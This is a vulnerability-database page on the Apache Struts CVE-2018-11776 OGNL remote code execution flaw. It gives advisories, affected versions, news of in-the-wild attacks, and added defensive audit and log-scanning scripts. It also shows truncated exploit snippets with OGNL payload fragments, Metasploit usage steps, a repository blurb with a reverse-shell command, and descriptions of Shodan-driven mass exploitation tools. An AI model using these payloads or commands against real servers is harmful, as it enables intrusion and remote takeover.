CVSSv2 base score: 9.3

CVE-2018-11776

Published: 22/08/2018 Updated: 14/03/2019
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
CVSS v3 Base Score: 8.1 | Impact Score: 5.9 | Exploitability Score: 2.2
VMScore: 1000
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 are exposed to possible remote code execution when alwaysSelectFullNamespace is true (set by the user or by a plugin such as the Convention Plugin) and, in addition, either results are used with no namespace while the enclosing package has no namespace or a wildcard namespace, or a url tag is used with neither value nor action set while the enclosing package has no namespace or a wildcard namespace. In those configurations the namespace is taken from the request URL, so an OGNL expression placed in the URL path is evaluated by the framework.
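The advisory leaves the affected configurations to manual review. As an added example (not code from this page, the Struts project, or any repository listed below), the check below audits a struts.xml for exactly the preconditions the summary describes: the alwaysSelectFullNamespace constant switched on, and a result in a package whose namespace is missing or a wildcard that does not pin its own namespace. The two configurations it audits are constructed for this example; the package, action and class names are placeholders, and the set of result types treated as namespace-dependent (redirectAction, the type the page's Metasploit module targets, plus chain and postback) is this example's assumption. The constant can also be set in struts.properties, which this XML-only check does not read.

```python
import xml.etree.ElementTree as ET

# Constant that makes the attacker-controlled namespace selectable.
ALWAYS_FULL_NS = "struts.mapper.alwaysSelectFullNamespace"

# Result types whose target URL is built from the action namespace.
# redirectAction is the type the exploits on this page target; chain and
# postback are included on the assumption that they build URLs the same way.
NAMESPACE_RESULTS = {"redirectAction", "chain", "postback"}

# Constructed, deliberately vulnerable configuration: the constant is on,
# the package has no namespace and the redirectAction result has none either.
VULNERABLE_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="chain" extends="struts-default">
    <action name="actionChain1" class="example.ActionChain1">
      <result type="redirectAction">
        <param name="actionName">register2</param>
      </result>
    </action>
  </package>
</struts>
"""

# Constructed, hardened configuration: explicit namespace on the package and
# on the result, constant left at its default of false.
HARDENED_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="false"/>
  <package name="chain" extends="struts-default" namespace="/chain">
    <action name="actionChain1" class="example.ActionChain1">
      <result type="redirectAction">
        <param name="actionName">register2</param>
        <param name="namespace">/chain</param>
      </result>
    </action>
  </package>
</struts>
"""


def package_namespace_state(pkg):
    """'missing', 'wildcard' or 'explicit' for a <package> element."""
    ns = pkg.get("namespace")
    if ns is None:
        return "missing"
    if "*" in ns:
        return "wildcard"
    return "explicit"


def audit_struts_xml(xml_text):
    """Return (package, action, reason) findings for the S2-057 preconditions."""
    root = ET.fromstring(xml_text)
    findings = []
    for const in root.iter("constant"):
        if (const.get("name") == ALWAYS_FULL_NS
                and const.get("value", "").strip().lower() == "true"):
            findings.append(("<constant>", ALWAYS_FULL_NS,
                             "alwaysSelectFullNamespace is true"))
    for pkg in root.iter("package"):
        state = package_namespace_state(pkg)
        if state == "explicit":
            continue  # the namespace cannot come from the request URL
        for action in pkg.iter("action"):
            for result in action.iter("result"):
                if result.get("type") not in NAMESPACE_RESULTS:
                    continue
                params = {p.get("name"): (p.text or "").strip()
                          for p in result.iter("param")}
                if not params.get("namespace"):
                    findings.append((pkg.get("name"), action.get("name"),
                                     "%s result without its own namespace in a "
                                     "package with %s namespace"
                                     % (result.get("type"), state)))
    return findings


if __name__ == "__main__":
    for label, doc in (("vulnerable", VULNERABLE_XML), ("hardened", HARDENED_XML)):
        print(label, audit_struts_xml(doc) or "no findings")
```

Run it against a real struts.xml with `audit_struts_xml(open("struts.xml").read())`; a clean result from the constant check still leaves the package findings worth fixing, since a plugin can switch alwaysSelectFullNamespace on without touching struts.xml.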

Vulnerability Trend

Affected Products

Vendor   Product   Versions
Apache   Struts    2.3.1, 2.3.1.1, 2.3.1.2, 2.3.3, 2.3.4, 2.3.4.1, 2.3.5, 2.3.6, 2.3.7, 2.3.8, 2.3.9, 2.3.10, 2.3.11, 2.3.12, 2.3.13, 2.3.14, 2.3.14.1, 2.3.14.2, 2.3.14.3, 2.3.15, 2.3.15.1, 2.3.15.2, 2.3.15.3, 2.3.16, 2.3.16.1, 2.3.16.2, 2.3.16.3, 2.3.17, 2.3.19, 2.3.20, 2.3.20.1, 2.3.20.2, 2.3.20.3, 2.3.21, 2.3.22, 2.3.23, 2.3.24, 2.3.24.2, 2.3.24.3, 2.3.25, 2.3.26, 2.3.27, 2.3.28, 2.3.28.1, 2.3.29, 2.3.30, 2.3.31, 2.3.32, 2.3.33, 2.5.1, 2.5.2, 2.5.3, 2.5.4, 2.5.5, 2.5.6, 2.5.7, 2.5.8, 2.5.9, 2.5.10, 2.5.11, 2.5.13, 2.5.14, 2.5.14.1, 2.5.15, 2.5.16

Vendor Advisories

Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when usin ...
A vulnerability in Apache Struts could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. The vulnerability exists because the affected software insufficiently validates user-supplied input, allowing the use of results with no namespace value and the use of url tags with no value or action. In cases where up ...
There is a vulnerability in Apache Struts to which the IBM FlashSystem™ V840 is susceptible. An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system ...
A vulnerability in Apache Struts affects IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500, IBM Spectrum Virtualize Software, IBM Spectrum Virtualize for Public Cloud and IBM FlashSystem V9000 and V9100 products. Apache Struts is used in the Service Assistant GUI. The Service Assistant CLI is unaffected ...
There is a vulnerability in Apache Struts to which the IBM FlashSystem™ 840 and 900 are susceptible. An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system ...
Summary: Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn't have value and action set and in same time, its upper action(s) have no or wildcard name ...
Oracle Security Alert Advisory - CVE-2018-11776. Description: This Security Alert addresses CVE-2018-11776, a vulnerability in Apache Struts 2. CVE-2018-11776 has received a CVSS v3 base score of 9.8. When the alwaysSelectFullNamespace option is enabled in a Struts 2 ...
Oracle Critical Patch Update Advisory - January 2019. Description: A Critical Patch Update is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previou ...
Oracle Critical Patch Update Advisory - October 2018. Description: A Critical Patch Update is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previou ...

Exploits

#!/usr/bin/python # -*- coding: utf-8 -*- # hook-s3c (github.com/hook-s3c), @hook_s3c on twitter import sys import urllib import urllib2 import httplib def exploit(host,cmd): print "[Execute]: {}".format(cmd) ognl_payload = "${" ognl_payload += "(#_memberAccess['allowStaticMethodAccess']=true)." ognl_payload += "(#cmd='{}')".f ...
#!/usr/bin/env python3 # coding=utf-8 # ***************************************************** # struts-pwn: Apache Struts CVE-2018-11776 Exploit # Author: # Mazin Ahmed <Mazin AT MazinAhmed DOT net> # This code uses a payload from: # github.com/jas502n/St2-057 # ***************************************************** import argparse im ...
## # This module requires Metasploit: metasploit.com/download # Current source: github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE # Eschewing CmdStager for now, since the use of '\' and ';' a ...
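All three exploits above deliver the OGNL expression in the URL path, wrapped in ${...}, at the position where the framework reads the action namespace. That makes the attack visible in ordinary web-server access logs. As an added example (not code from any of these exploits or from the page), the scanner below decodes the request path of each Combined Log Format line and flags OGNL openers; the log lines are constructed for this example, and the probe/exec severity split is this example's own convention, not a vendor signature.

```python
import re
from urllib.parse import unquote

# Combined Log Format prefix: client identity user [time] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# An OGNL expression opener once the path is decoded: ${...} or %{...}.
OGNL_OPENER = re.compile(r"[$%]\{")

# Constructed sample lines (not from any real server): a normal request, the
# arithmetic canary used by the PoCs on this page, a percent-encoded
# allowStaticMethodAccess payload, and a query-string near miss.
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Aug/2018:10:14:02 +0000] "GET /struts2-showcase/index.action HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [28/Aug/2018:10:15:11 +0000] "GET /struts2-showcase/${333+333}/help.action HTTP/1.1" 302 0 "-" "python-requests/2.19"',
    '10.0.0.7 - - [28/Aug/2018:10:15:40 +0000] "GET /struts2-showcase/%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29%7D/help.action HTTP/1.1" 302 0 "-" "python-requests/2.19"',
    '10.0.0.9 - - [28/Aug/2018:10:16:00 +0000] "GET /struts2-showcase/search.action?q=%24%7Bfoo HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]


def decode_path(target, rounds=3):
    """Drop the query string (the namespace is taken from the path) and
    percent-decode repeatedly so double-encoded payloads are caught."""
    path = target.split("?", 1)[0]
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify(line):
    """Return a finding dict for a suspicious request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = decode_path(m.group("target"))
    if not OGNL_OPENER.search(path):
        return None
    # A bare arithmetic canary is a probe; anything touching #_memberAccess
    # or calling a method is an execution attempt.
    severity = "exec" if ("#_memberAccess" in path or "(" in path) else "probe"
    return {"client": m.group("client"), "time": m.group("time"),
            "status": m.group("status"), "path": path, "severity": severity}


def scan(lines):
    """All findings, in log order."""
    return [f for f in map(classify, lines) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print("%(severity)-5s %(client)s %(time)s %(status)s %(path)s" % f)
```

The query string is deliberately ignored: the Struts namespace comes from the path, and scanning parameters for `${` produces noise from template-like inputs. A 302 on a path that decodes to an OGNL opener is the strongest signal, because the redirectAction result has then already built a URL from the evaluated namespace.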

Mailing Lists

Apache Struts versions 2.3 up to 2.3.34 and 2.5 up to 2.5.16 remote code execution exploit ...
This Metasploit module exploits a remote code execution vulnerability in Apache Struts versions 2.3 through 2.3.34, and 2.5 through 2.5.16. Remote code execution can be performed via an endpoint that makes use of a redirect action. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* paylo ...
[CVEID]: CVE-2018-11776 [PRODUCT]: Apache Struts [VERSION]: Apache Struts 2.3 to 2.3.34 and 2.5 to 2.5.16 [PROBLEMTYPE]: Remote Code Execution [REFERENCES]: cwiki.apache.org/confluence/display/WW/S2-057 [DESCRIPTION]: Man Yue Mo from the Semmle Security Research team noticed that Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer f ...

Metasploit Modules

Apache Struts 2 Namespace Redirect OGNL Injection

This module exploits a remote code execution vulnerability in Apache Struts versions 2.3 - 2.3.34, and 2.5 - 2.5.16. Remote code execution can be performed via an endpoint that makes use of a redirect action. Note that this exploit is dependent on the version of Tomcat running on the target. Versions of Tomcat starting with 7.0.88 currently don't support payloads larger than ~7.5kb. Windows Meterpreter sessions on Tomcat >= 7.0.88 are currently not supported. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.

msf > use exploit/multi/http/struts2_namespace_ognl
msf exploit(struts2_namespace_ognl) > show targets
    ...targets...
msf exploit(struts2_namespace_ognl) > set TARGET <target-id>
msf exploit(struts2_namespace_ognl) > show options
    ...show and set options...
msf exploit(struts2_namespace_ognl) > exploit

Github Repositories

CVE-2018-11776: On 23 August 2018 Apache Struts 2 released a new security bulletin. Apache Struts 2 has a high-severity remote code execution vulnerability, reported by a researcher on the Semmle Security Research team and numbered CVE-2018-11776 (S2-057). In Struts 2, if the namespace value is not set in the XML configuration and the Action Configuration sets no namespace or a wildcard namespace, this can lead to remote

CVE-2018-11776: This is part of Cved, a tool to manage vulnerable docker containers. Cved: gitlab.com/git-rep/cved. Image source: github.com/cved-sources/cve-2018-11776. Image author: github.com/knqyf263/CVE-2018-11776

Vulnerable docker container for CVE-2018-11776. # docker pull bhdresh/cve-2018-11776:1.0 # docker run -dit -p <IP ADDRESS>:8080:8080 bhdresh/cve-2018-11776:1.0. PoC - 1 Request: <IP ADDRESS>:8080/struts2-showcase-2.3.14/${333+333}/help.action. Result: <IP ADDRESS>:8080/struts2-showcase-2.3.14/666/help.action. PoC - 2

CVE-2018-11776 Docker container and POC exploit written in Go. You can build your own image and run it: docker build -t your_image_name . ; docker container run -it --rm -p 8080:8080 your_image_name. Or you can just pull the one I created with love for you: docker container run -it --rm -p 8080:8080 tuxotron/cve-2018-11776. Vulnerable application running on port 8080. To try the ex

S2-057-CVE-2018-11776: A simple exploit for Apache Struts RCE S2-057 (CVE-2018-11776). IMPORTANT: Is provided only for educational or information purposes. Deploy test environment: git clone github.com/vulhub/vulhub; cd vulhub/struts2/s2-057; docker-compose up -d. Usage: exploit.py <url> <command> <action> <payload>. Exam

struts-pwn - CVE-2018-11776 Exploit: An exploit for Apache Struts CVE-2018-11776. Usage: Check if the vulnerability exists against a single URL: python struts-pwn.py --url 'example.com/demo/struts2-showcase/index.action'. Check if the vulnerability exists against a list of URLs: python struts-pwn.py --list 'urls.txt'. Exploit a single URL: python struts-pw

CVE-2018-11776: Environment for CVE-2018-11776 / S2-057. Demo: Run server: $ docker run -d --hostname struts2 --name cve-2018-11776 -p 30080:8080 knqyf263/cve-2018-11776. Exploit: $ nc -l 10000 (or nc -lp 10000) $ python3 exploit.py localhost:30080 'bash -i >& /dev/tcp/192.168.33.1/10000 0>&1'

CVE-2018-11776-Python-PoC: hook-s3c (github.com/hook-s3c), @hook_s3c on twitter. Working Python test and PoC for CVE-2018-11776, originally appearing on github.com/hook-s3c/CVE-2018-11776-Python-PoC. What's going on? Man Yue Mo from Semmle has disclosed a Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request. Versions affected are 2

Apache Struts Vulnerability Demo (CVE-2018-11776). Description: Spins up an isolated test environment for experimentation with Apache Struts vulnerability CVE-2018-11776. Getting Started: To bring up the test environment, run the following command: aws cloudformation create-stack \ --template-body file://cfn.yml \ --stack-name <STACK_NAME> \ --parameters \ ParameterK

Strutter: Proof of Concept for CVE-2018-11776, comes complete with the ability to search the Shodan API for targets. CVE-2018-11776: Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn

APACHE STRUTS SHODAN EXPLOIT POC Author: @037 Original code can be found here This tool takes advantage of CVE-2018-11776 and Shodan to perform mass exploitation of verified and vulnerable Apache Struts servers Shodan search parameter has been left out to weed out any skids trying to use this tool for malicious reasons This tool is created to be treated as a proof of conce

Quick CVE lab setup. Usage: $ git clone github.com/white3/Cveker.git, enter the directory of the CVE you want to experiment with, then $ docker-compose up -d. See the README under each CVE directory for details. Available CVEs (CVE ID, title): CVE-2018-11776, S2-057 remote code execution

CVE-2018-11776 Proof of Concept exploit so I could quickly assess what sorts of protections and fixes are available. Originally found by Man Yue Mo, Semmle: semmle.com/news/apache-struts-CVE-2018-11776. Semmle had a "Apache Struts RCE - CVE-2018-11776 - PoC Exploit Demo" YouTube video up for a bit, but I believe it's gone or, at least, no longer linked to

Mitaka: Mitaka is an OSINT-friendly browser extension which can: extract & refang IoCs from a block of text, e.g. example[.]com to example.com; search / scan them on various engines, e.g. VirusTotal, urlscan.io, Censys, Shodan, etc. Features: Supported IOC types (name, description, e.g.): text - freetext, any string(s); ip - IPv4 address, 8.8.8.8; domain - domain name, git

Deep Security Smart Check reporting module. Maintained by Tejas Sheth. This module shows how to use the Deep Security Smart Check API to retrieve the vulnerability findings from the last scan on an image. See the API reference documentation for more things you can do with the Deep Security Smart Check API. Get started: Install dependencies. You will need Python 3 and pipenv to ins

Struts2-057/CVE-2018-11776: analysis of the RCE vulnerability in both version branches (with EXP). Ivan@360云影实验室, 24 August 2018. 0x01 Preface: On 22 August 2018 Apache Struts 2 released a new security bulletin. Apache Struts 2 has a high-severity remote code execution vulnerability (S2-057/CVE-2018-11776), discovered by Man Yue Mo of the Semmle Security Research team. The vulnerability is caused by the Struts2 development framework

CVE-2018-11776 (S2-057). [*] Usage: S2-057.jar <url> <action> <command> <payload (1-5)>. [*] Example: S2-057.jar "example.com/struts2-showcase/" "/actionChain1.action" "whoami" 4

Domainker. Setup: the Python PyPI package got removed; if you want to use this tool follow the steps below. Manual setup: git clone github.com/BitTheByte/Domainker; cd Domainker; pip install -r requirements.txt; python domainker.py. How to use: I developed this tool to be easily managed and upgraded, so I created it as small plugin systems connected together. Plugins and usage: lib

St2-057 online target environment, enjoy! 0x01 Set up the environment with docker: github.com/vulhub/vulhub/tree/master/struts2/s2-048, then docker-compose up -d. 0x02 Build the st2-057 vulnerable environment: docker exec -i -t 88fd8d560155 /bin/bash to enter the container started in the background. According to the bulletin at struts.apache.org/releases.html (Release, Release Date, Vulnerability, Version Notes): Struts 2.5.16, 16 March 2018, S2-057

desc Docker container for a configured-to-be-vulnerable version of struts2-showcase application

awesome-java-security-checklist: Starting a Java security series, sharing and summarising the material found while learning; continuously updated. Stars and submissions of new content are welcome to help correct and complete it. All material is collected from the internet; if an author is not credited and there is an infringement, please contact h4x0er[at]secbug.org promptly for removal or amendment. If you like it, please star it; if you do not plan to contribute,

WsylibBookRS. Main content: solves the problem that the current school library management system does not let students recommend books to the library; tested in use and suitable for a production environment. Technologies: spring 4.3.18, spring jdbc 4.3.18, struts 2.5.18, mysql 5.7. Development environment: eclipse, maven 3.5. Suggestions and pull requests: if you are interested in this project, please lift your honourable little hand and fork it

Apache-Struts-v3: Script that combines 3 RCE vulnerabilities in Apache Struts and can also create a shell on the server. SHELL: php function finished :), jsp function in development. CVE ADD: CVE-2013-2251 'action:', 'redirect:' and 'redirectAction'; CVE-2017-5638 Content-Type; CVE-2018-11776 'redirect:'

CVE-exploits This repository is a collections of CVE exploits

ABOUT: Kn0ck is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. KN0CK FEATURES: Automatically collects basic recon; automatically launches Google hacking queries against a target domain; automatically enumerates open ports via Nmap port scanning; automatically brute-forces sub-domains, gathers DNS info and checks f

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

Etrata CI Vuln Scanner. What is it? This is a lightweight python script that will load/read a directory of CVEs and allow you to search on them. Usage: etrata -n struts -v 2.3.32 > 'CVE-2017-9787', > 'CVE-2017-9791', > 'CVE-2017-9793', > 'CVE-2017-9804', > 'CVE-2017-9805', > 'CVE-2018

ActiveScan++ ActiveScan++ extends Burp Suite's active and passive scanning capabilities Designed to add minimal network overhead, it identifies application behaviour that may be of interest to advanced testers: Potential host header attacks (password reset poisoning, cache poisoning, DNS rebinding) Edge Side Includes XML input handling Suspicious input transformation (eg

Payloads All The Things: A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques! I <3 pull requests :) You can also contribute with a beer IRL or with buymeacoffee.com. Every section contains the following files (you can use the _template_vuln folder to create a new chapter): README.md - vulnerability d

Jok3r (README badges: project logo; Python 3.6, www.python.org/downloads/release/python-366/; documentation on Read the Docs, jok3r.readthedocs.io/en/latest/)

Jok3r - Network and Web Pentest Framework. Jok3r is a Python3 CLI application aimed at helping penetration testers with network infrastructure and black-box web security testing. Its main goal is to save time on everything that can be automated in the network/web under audit, so that more time is left for things that are more

Jok3r v3 beta - Network & Web Pentest Automation Framework, www.jok3r-framework.com. WARNING: Project is still in version 3 BETA. It is still under active development and bugs might be present. Many tests are going on: see github.com/koutto/jok3r/blob/master/tests/TESTS.rst. Ideas, bug reports, contributions are welcome! Overview, Features, Demos, Architecture

Project introduction: information gathering, attack attempts to gain access, persistent control, privilege escalation, internal network information gathering, lateral movement, data analysis (with further persistent control built on that basis), and trace removal. Address | introduction (name | description): security-related resource lists: arxiv.org, Cornell University open-access documents; github.com/sindresorhus/awesome, the awesome series

Awesome CVE PoC A curated list of CVE PoCs Here is a collection about Proof of Concepts of Common Vulnerabilities and Exposures, and you may also want to check out awesome-web-security Please read the contribution guidelines before contributing This repo is full of PoCs for CVEs If you enjoy this awesome list and would like to support it, check out my Patreon page :

Recent Articles

Thought Patch Tuesday was a load? You gotta check out this Oracle mega-advisory, then
The Register • Shaun Nichols in San Francisco • 16 Oct 2018

And you'll definitely want to check out the libssh flaw

Oracle has released a wide-ranging security update to address more than 300 CVE-listed vulnerabilities in its various enterprise products.
The October release covers the gamut of Oracle's offerings, including its flagship Database, E-Business Suite, and Fusion Middleware packages.
For Database, the update addresses a total of three flaws. Two of the vulnerabilities (CVE-2018-3259 and CVE-2018-3299) can be remotely exploited without authentication, while the third, CVE-2018-7489, woul...

CroniX CryptoMiner Kills Rivals to Reign Supreme
BleepingComputer • Ionut Ilascu • 06 Sep 2018

The operator of a new cryptomining campaign takes aggressive actions against its competition and halts other cryptojacking activity on the machines it claims.
Cybercriminals are quick to take advantage of any proof-of-concept (PoC) exploit code that falls into their hands. For the recently disclosed Apache Struts vulnerability (CVE-2018-11776) there are multiple PoCs available, so news of the bug exploited in the wild came as no surprise.
Cryptomining is all the rage these days, and...

Hackers latch onto new Apache Struts megavuln to mine cryptocurrency
The Register • John Leyden • 30 Aug 2018

Underground forums alight with Struts chat, we hear

A recently uncovered critical vulnerability in Apache Struts is already being exploited in the wild.
Threat intel firm Volexity has warned that hackers are abusing the CVE-2018-11776 vuln to attack systems running Apache Struts 2, a popular open-source framework for developing applications in Java. Specifically, some nasty characters have abused the flaw while trying to install the CNRig cryptocurrency miner, researchers said.
The vulnerability appears to be easier to exploit than th...

PoC targeting critical Apache Struts bug found online
welivesecurity • Tomáš Foltýn • 28 Aug 2018

Researchers have discovered freely available proof-of-concept (PoC) code that can be used to exploit a critical security hole in the Apache Struts 2 web application framework shortly after the vulnerability was disclosed and the patch was released.
The PoC, “including a Python script that allows for easy exploitation”, was found by threat intelligence company Recorded Future on the software development platform GitHub. The firm also said that it has spotted chatter on underground forum...

Active Attacks Detected Using Apache Struts Vulnerability CVE-2018-11776
BleepingComputer • Catalin Cimpanu • 28 Aug 2018

After last week a security researcher revealed a vulnerability in Apache Struts, a piece of very popular enterprise software, active exploitation attempts have started this week.
The vulnerability in question is tracked as CVE-2018-11776, a remote code execution flaw that allows an attacker to gain control over Struts-based web applications.
The vulnerability is not exploitable in default Struts configurations, according to an analysis by Palo Alto Networks, but the flaw is of intere...

Apache's latest SNAFU – Struts normal, all fscked up: Web app framework needs urgent patching
The Register • Kieren McCarthy in San Francisco • 22 Aug 2018

Paging Equifax: Time to update again, fellas

Another critical security hole has been found in Apache Struts 2, requiring an immediate update.
The vulnerability – CVE-2018-11776 – affects core code and allows miscreants to pull off remote code execution against vulnerable servers and websites. It affects all versions of Struts 2, the popular open-source framework for Java web apps.
The Apache Software Foundation has "urgently advised" anyone using Struts to update to the latest version immediately, noting that the last time ...